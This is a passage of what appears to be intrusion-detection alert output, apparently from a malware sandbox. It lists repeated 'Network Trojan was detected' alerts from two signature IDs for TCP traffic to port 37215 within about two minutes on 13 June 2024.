              SID:2829579
              Source Port:52300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244209
              SID:2835222
              Source Port:57948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042688
              SID:2835222
              Source Port:35558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133506
              SID:2835222
              Source Port:38554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231551
              SID:2829579
              Source Port:55958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230449
              SID:2829579
              Source Port:60544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833894
              SID:2829579
              Source Port:56164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349281
              SID:2835222
              Source Port:52620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028699
              SID:2829579
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635162
              SID:2829579
              Source Port:36992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273578
              SID:2835222
              Source Port:45164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711163
              SID:2829579
              Source Port:39298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822239
              SID:2835222
              Source Port:51298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755361
              SID:2835222
              Source Port:40190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568166
              SID:2829579
              Source Port:52144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993880
              SID:2829579
              Source Port:33412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672455
              SID:2829579
              Source Port:44762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247801
              SID:2829579
              Source Port:34328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270996
              SID:2835222
              Source Port:40126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822993
              SID:2835222
              Source Port:57978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340836
              SID:2829579
              Source Port:42310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.378017
              SID:2835222
              Source Port:48726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087009
              SID:2829579
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.968879
              SID:2835222
              Source Port:36638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090232
              SID:2835222
              Source Port:53022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371660
              SID:2829579
              Source Port:42238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573382
              SID:2829579
              Source Port:41184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871109
              SID:2829579
              Source Port:39096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127207
              SID:2829579
              Source Port:54842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727152
              SID:2835222
              Source Port:53034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822613
              SID:2835222
              Source Port:53816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941623
              SID:2835222
              Source Port:40422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671816
              SID:2829579
              Source Port:51310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247776
              SID:2835222
              Source Port:45958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802832
              SID:2829579
              Source Port:54528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629257
              SID:2829579
              Source Port:57420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484893
              SID:2835222
              Source Port:50212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568198
              SID:2829579
              Source Port:36654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545514
              SID:2829579
              Source Port:56294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309124
              SID:2829579
              Source Port:52112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751203
              SID:2829579
              Source Port:53490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127523
              SID:2835222
              Source Port:42178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126293
              SID:2835222
              Source Port:38356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971541
              SID:2835222
              Source Port:42666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375417
              SID:2829579
              Source Port:53642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658553
              SID:2835222
              Source Port:40742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820351
              SID:2829579
              Source Port:50854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221070
              SID:2835222
              Source Port:58648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316812
              SID:2835222
              Source Port:37136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370201
              SID:2829579
              Source Port:51314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263760
              SID:2835222
              Source Port:56314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569495
              SID:2835222
              Source Port:54170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888362
              SID:2835222
              Source Port:32982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504246
              SID:2829579
              Source Port:34168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545865
              SID:2835222
              Source Port:35518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373289
              SID:2835222
              Source Port:53124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219409
              SID:2829579
              Source Port:51318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158967
              SID:2835222
              Source Port:40326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247330
              SID:2829579
              Source Port:46728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248502
              SID:2835222
              Source Port:51130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276329
              SID:2835222
              Source Port:41382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092916
              SID:2835222
              Source Port:39344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238577
              SID:2829579
              Source Port:59274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230668
              SID:2829579
              Source Port:46392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604543
              SID:2829579
              Source Port:50938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504158
              SID:2829579
              Source Port:34642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787787
              SID:2835222
              Source Port:43862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014597
              SID:2835222
              Source Port:33930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173811
              SID:2829579
              Source Port:36000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991744
              SID:2835222
              Source Port:53058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256077
              SID:2829579
              Source Port:49348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546633
              SID:2829579
              Source Port:56572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417559
              SID:2835222
              Source Port:35344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093591
              SID:2829579
              Source Port:51710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509189
              SID:2829579
              Source Port:41990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474945
              SID:2835222
              Source Port:32908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041121
              SID:2835222
              Source Port:51626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093284
              SID:2835222
              Source Port:47370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477929
              SID:2829579
              Source Port:42400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694210
              SID:2829579
              Source Port:40900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100164
              SID:2835222
              Source Port:38770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488836
              SID:2835222
              Source Port:51730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610803
              SID:2835222
              Source Port:47962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458174
              SID:2835222
              Source Port:55890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695168
              SID:2835222
              Source Port:32932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787911
              SID:2835222
              Source Port:41654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503849
              SID:2835222
              Source Port:35418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488750
              SID:2835222
              Source Port:46392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440167
              SID:2829579
              Source Port:57168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309609
              SID:2835222
              Source Port:33856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869275
              SID:2835222
              Source Port:59352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754794
              SID:2835222
              Source Port:55254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175657
              SID:2835222
              Source Port:35752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456330
              SID:2829579
              Source Port:51920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838283
              SID:2829579
              Source Port:57556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212575
              SID:2835222
              Source Port:54358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886658
              SID:2829579
              Source Port:42520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994381
              SID:2829579
              Source Port:45124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028977
              SID:2835222
              Source Port:60438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670439
              SID:2829579
              Source Port:45942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279138
              SID:2829579
              Source Port:50730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971354
              SID:2835222
              Source Port:56056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658816
              SID:2829579
              Source Port:44638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805525
              SID:2835222
              Source Port:45694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418245
              SID:2835222
              Source Port:36746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175421
              SID:2829579
              Source Port:47824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193679
              SID:2829579
              Source Port:51802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572726
              SID:2835222
              Source Port:58724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544497
              SID:2829579
              Source Port:48728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510104
              SID:2835222
              Source Port:55656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782810
              SID:2829579
              Source Port:35956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269001
              SID:2835222
              Source Port:54794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054971
              SID:2829579
              Source Port:43312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089041
              SID:2835222
              Source Port:34038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294241
              SID:2835222
              Source Port:38030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887526
              SID:2835222
              Source Port:40772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254864
              SID:2829579
              Source Port:38680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158531
              SID:2835222
              Source Port:57484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785769
              SID:2829579
              Source Port:45360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669952
              SID:2829579
              Source Port:48856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317684
              SID:2829579
              Source Port:60680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025583
              SID:2835222
              Source Port:40600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416975
              SID:2829579
              Source Port:51988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302218
              SID:2835222
              Source Port:50262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039332
              SID:2835222
              Source Port:52392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306380
              SID:2829579
              Source Port:57098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357379
              SID:2835222
              Source Port:50284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123580
              SID:2835222
              Source Port:49754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612092
              SID:2835222
              Source Port:38098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240008
              SID:2829579
              Source Port:35200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228511
              SID:2835222
              Source Port:56736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400974
              SID:2829579
              Source Port:43812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099204
              SID:2835222
              Source Port:43366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011370
              SID:2829579
              Source Port:48354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107070
              SID:2835222
              Source Port:53366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508321
              SID:2835222
              Source Port:56090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908611
              SID:2835222
              Source Port:46438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755217
              SID:2829579
              Source Port:34486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929186
              SID:2835222
              Source Port:42582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344643
              SID:2829579
              Source Port:59828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376476
              SID:2835222
              Source Port:52076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422635
              SID:2835222
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730152
              SID:2835222
              Source Port:36574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991637
              SID:2835222
              Source Port:50876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156257
              SID:2835222
              Source Port:42666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754281
              SID:2829579
              Source Port:48340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439828
              SID:2829579
              Source Port:36308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239629
              SID:2835222
              Source Port:34736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304952
              SID:2835222
              Source Port:42560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477640
              SID:2829579
              Source Port:38600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609409
              SID:2829579
              Source Port:34414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564832
              SID:2829579
              Source Port:35720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424255
              SID:2835222
              Source Port:55386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991349
              SID:2829579
              Source Port:35862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945699
              SID:2835222
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438592
              SID:2829579
              Source Port:53510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212350
              SID:2829579
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357878
              SID:2835222
              Source Port:50934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991862
              SID:2829579
              Source Port:35802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869322
              SID:2829579
              Source Port:47570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157622
              SID:2829579
              Source Port:58786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301062
              SID:2829579
              Source Port:35362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220078
              SID:2835222
              Source Port:40664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401959
              SID:2835222
              Source Port:49162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550943
              SID:2829579
              Source Port:52984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726843
              SID:2829579
              Source Port:50776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610712
              SID:2835222
              Source Port:57292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611516
              SID:2829579
              Source Port:46802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240294
              SID:2829579
              Source Port:35430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657255
              SID:2829579
              Source Port:42800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221328
              SID:2829579
              Source Port:39622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093976
              SID:2835222
              Source Port:33304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476805
              SID:2835222
              Source Port:39652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401098
              SID:2829579
              Source Port:41640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884351
              SID:2829579
              Source Port:54792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408053
              SID:2835222
              Source Port:56272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402706
              SID:2835222
              Source Port:45748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867376
              SID:2835222
              Source Port:56528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458509
              SID:2835222
              Source Port:59132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194325
              SID:2829579
              Source Port:50178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271656
              SID:2835222
              Source Port:41954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781977
              SID:2835222
              Source Port:45352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.792167
              SID:2835222
              Source Port:44438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090839
              SID:2829579
              Source Port:52174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450735
              SID:2829579
              Source Port:43242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544958
              SID:2829579
              Source Port:37472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041655
              SID:2835222
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257971
              SID:2829579
              Source Port:56560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613304
              SID:2835222
              Source Port:47746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177562
              SID:2829579
              Source Port:56244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027594
              SID:2835222
              Source Port:47034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177214
              SID:2829579
              Source Port:34504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131314
              SID:2835222
              Source Port:59402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833753
              SID:2835222
              Source Port:33954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676337
              SID:2835222
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302379
              SID:2829579
              Source Port:48932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552588
              SID:2829579
              Source Port:52532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246136
              SID:2829579
              Source Port:49452
              Destination Port:37215
